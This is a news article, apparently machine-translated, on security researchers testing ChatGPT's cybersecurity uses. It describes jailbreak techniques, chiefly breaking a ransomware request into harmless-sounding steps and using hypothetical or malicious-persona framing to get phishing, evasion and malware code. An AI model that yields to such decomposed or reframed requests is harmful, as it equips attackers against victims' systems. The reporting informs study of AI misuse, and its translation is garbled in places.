How ChatGPT is changing the way cybersecurity practitioners view the potential of AI

A new AI chatbot demonstrates surprising capabilities in offensive and defensive cybersecurity, while changing minds about the long-term potential of machine learning and AI-based systems. (Image credit: imaginima via Getty)

In some cybersecurity circles, it’s become a running joke over the years to mock the way AI and its capabilities are touted by LinkedIn vendors or thought leaders.

The bottom line is that while there are valuable tools and use cases for the technology – in cybersecurity as well as other areas – many solutions are proving to be overhyped by marketing teams and far less sophisticated or practices than advertised.

That’s part of why the response from information security professionals over the past week to ChatGPT has been so compelling. A community already ready to be skeptical of modern AI has become obsessed with the real-world potential cybersecurity applications of a machine learning chatbot.

“It really influenced how I thought about the role of machine learning and AI in innovations,” said Casey John Ellis, CTO, Founder and President of BugCrowd in an interview.

Ellis’ experience mirrors dozens of other cybersecurity researchers who, like much of the tech world, have spent the past week pushing, pushing and testing ChatGPT for its depth, sophistication and capabilities. What they found could lend more weight to claims that artificial intelligence, or at least advanced machine learning programs, may be the kind of disruptive and game-changing technology long promised.

In a short time, security researchers were able to perform a number of offensive and defensive cybersecurity tasks, such as generating convincing or polished phishing emails, developing usable Yara rules, detecting buffer overflows in the code, generating escape code that could help attackers. bypass threat detection and even write malware.

While ChatGPT’s settings prevent it from doing outright malicious things, like detailing how to build a bomb or writing malicious code, several researchers have found a way around these protections.

Dr. Suleyman Ozarslan, security researcher and co-founder of Picus Security, said he was able to get the program to perform a number of offensive and defensive cybersecurity tasks, including creating an e- mail on the subject of the World Cup in “perfect English”. as well as generate both Sigma detection rules to spot cybersecurity anomalies and evasion code that can bypass detection rules.

Most notably, Ozarslan successfully tricked the program into writing ransomware for Mac operating systems, despite specific terms of service that prohibit this practice.

“Because ChatGPT won’t directly write ransomware code, I’ve described ransomware tactics, techniques, and procedures without describing it as such. It’s like a 3D printer that won’t print a weapon to fire, but will happily print a barrel, magazine, grip and trigger together if you ask him,” Ozarslan said in an email alongside his research. “I told the AI ​​that I wanted to write software in Swift, I wanted it to find all the Microsoft Office files on my MacBook and send those files over HTTPS to my web server. I also wanted him to encrypt all Microsoft Office files on my MacBook and send me the private key to use for decryption.

The prompt allowed the program to generate sample code without triggering a violation or generating a warning message to the user.

Screenshot of a prompt tricking ChatGPT into writing ransomware code, which is prohibited by the terms of service. (Image credit: Dr. Suleyman Ozarslan and Picus Security)

Researchers were able to leverage the program to unlock features that could make life easier for cybersecurity advocates and malicious hackers. The dual-purpose nature of the program has spurred some comparisons to the Cobalt Strike and Metasploit programs, which function as both legitimate penetration testing and adversary simulation software while also serving as the most popular tools for attackers. real cybercriminals and malicious hacking groups. victim systems.

Although ChatGPT may end up presenting similar concerns, some argue that this is a reality of most new innovations, and that while creators must do their best to close avenues of abuse, it is impossible to control or to completely prevent bad actors from using new technologies for harmful purposes.

“Technology shakes things up, that’s its job. I think unintended consequences are part of that disruption,” said Ellis, who said he expects to see tools like ChatGPT used by bug bounty hunters and the threat actors they seek in the coming months. next five to 10 years. “Ultimately it’s the supplier’s role to minimize these things, but you also have to be diligent.”

Real potential – and real limits – of ChatGPT

Although the program has impressed and many people interviewed by SC Media expressed the belief that it would at the very least lower the barrier of entry for a number of basic offensive and defensive hacking tasks, there are still real limitations. at its output.

As mentioned, ChatGPT refuses to do downright unethical things like writing malicious code, teaching you how to build a bomb, or commenting on the inherent superiority of different races or genders.

However, these settings can often be circumvented by tricking or socially manipulating the program. For example, asking him to treat the question as a hypothesis or answer a prompt from the perspective of a fictitious malicious party. Yet even then, some of the answers tend to be superficial and merely mimic on a superficial level what a convincing answer might look like to an uninformed party.

“One of the disclaimers mentioned by OpenAI and ChatGPT: you have to be very careful about the problem of consistent nonsense,” said Jeff Pollard, vice president and principal analyst at Forrester, who studied the program and its capabilities in the cybersecurity space. “It might sound logical, but it’s not fair, it’s not factually correct, you can’t really follow it and do anything with it…it’s not like you can suddenly use it to write software if you don’t write software… you [still] need to know what you’re actually doing to take advantage of it.

When it generates code or malware, it tends to be relatively simplistic or full of bugs.

Ellis called the emergence of ChatGPT an “oh shit” moment for the adversarial knowledge field of AI/machine learning. The ability of several security researchers to find loopholes allowing them to circumvent the parameters put in place by program managers to prevent abuse highlights how the capabilities and vulnerabilities around emerging technologies can often exceed our ability to secure them. , at least in the early stages.

“We’ve seen that with mobile [vulnerabilities] in 2015, with the IoT around 2017 when Mirai happened. You have this type of rapid deployment of technology because it solves a problem, but at some point in the future people realize that they’ve made security assumptions that aren’t sound,” Ellis said. .

ChatGPT relies on what is called reinforcement learning. This means that the more it interacts with humans and user-generated prompts, the more it learns. It also means that the program — whether through user feedback or changes made by its managers — could eventually learn to understand some of the tactics researchers have used to circumvent its ethical filters. But it’s also clear that the cybersecurity community in particular will continue to do what they do best, testing the safeguards systems have in place and finding weak spots.

“I think the super interesting point… there’s this aspect when you activate things like this and release them into the world… you quickly learn how terrible many human beings are,” Pollard said. “What I mean by that is that you’re also starting to realize…that [cybersecurity professionals] finding ways around controls because our work is about people finding ways around controls. »

Some in the industry were less surprised by the applicability of engines like ChatGPT to cybersecurity. Toby Lewis, head of threat analysis at DarkTrace, a cyber defense company that bases its core tools on a proprietary AI engine, told SC Media that he was impressed with some of the cyber capabilities programs like ChatGPT.

“Absolutely, there are some examples of code generated by ChatGPT…the first response to that is that it’s interesting, it definitely lowers the barrier, at the very least, for someone starting out for this space”, Lewis said.

The ultimate potential of ChatGPT is studied in real time. For every example of a user finding a new or interesting use case, there is another example of someone digging below the surface to discover the nascent engine’s shallowness or ability to intuit the “right” answer. like a human mind.

Even if these efforts eventually run up against the limits of the program, their long-term impact is already being felt in cybersecurity. Pollard said the emergence of ChatGPT has already helped better crystallize for him and other analysts how similar programs could be practically leveraged by companies for defensive cybersecurity work in the future.

“I think there’s an aspect to looking at what he’s doing now and it’s not that hard to see a future where you could take a SOC analyst who maybe has less experience, doesn’t have haven’t seen as much and they have something like this sitting next to them that helps them communicate the information, maybe helps them understand it or contextualize it, maybe it gives them some insight into what it takes do next,” he said.

Lewis said that even in the short time the program has been made available to the public, he’s already noticed a softening of the cynicism that some of his cybersecurity colleagues have traditionally brought to discussions of AI in the cybersecurity.

Although the emergence of ChatGPT could eventually lead to the development of technologies or companies competing with DarkTrace, Lewis also said that it is also much easier to explain the value these technologies bring to the cybersecurity space. .

“AI is often seen as one of those industry buzzwords that gets sprinkled on a fancy new product. ‘There’s AI, so it’s amazing’ and I think that it’s always hard to fight that,” Lewis said. “Making the use of AI more accessible, more entertaining perhaps, in a way where [security practitioners] can just play with it, they’ll learn about it and that means I can now talk to a security researcher… and suddenly a few say “you know, I see where this can be really helpful”.

Leave a Reply